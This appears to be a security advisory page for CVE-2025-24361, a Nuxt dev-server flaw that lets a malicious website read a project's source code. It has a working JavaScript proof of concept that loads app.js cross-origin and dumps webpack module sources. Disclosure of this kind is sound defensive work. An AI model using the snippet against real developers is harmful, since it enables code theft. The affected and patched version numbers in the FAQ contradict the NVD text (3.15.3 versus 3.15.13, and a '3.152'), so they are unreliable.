CVE-2025-24361: Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Summary Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxtapp, the attacker can get the source code.
PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run npm run dev 1. Open http://localhost:3000 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console.
js const script = document.createElement('script') script.src = 'http://localhost:3000/nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxtapp) { const moduleList = window.webpackChunknuxtapp[page][1] console.log(moduleList)
for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script)
!image It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).
Impact Users using webpack / rspack builder may get the source code stolen by malicious websites.
Other sources
Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using Function::toString against the values in window.webpackChunknuxtapp, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.
— NVD
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2025-24361?
CVE-2025-24361 is considered a critical vulnerability due to the potential for source code theft through malicious websites.
How do I fix CVE-2025-24361?
To fix CVE-2025-24361, update your Nuxt application to version 3.15.3 or later for both @nuxt/rspack-builder and @nuxt/webpack-builder.
Which versions of Nuxt are affected by CVE-2025-24361?
Nuxt versions ranging from 3.0.0 to 3.15.12 and 3.12.2 to below 3.152 are affected by CVE-2025-24361.
What is the attack vector for CVE-2025-24361?
The attack vector for CVE-2025-24361 involves an attacker injecting malicious scripts through the use of classic script tags that bypass the same origin policy.
Is CVE-2025-24361 a client-side or server-side vulnerability?
CVE-2025-24361 is primarily a client-side vulnerability that can lead to unauthorized access to sensitive source code.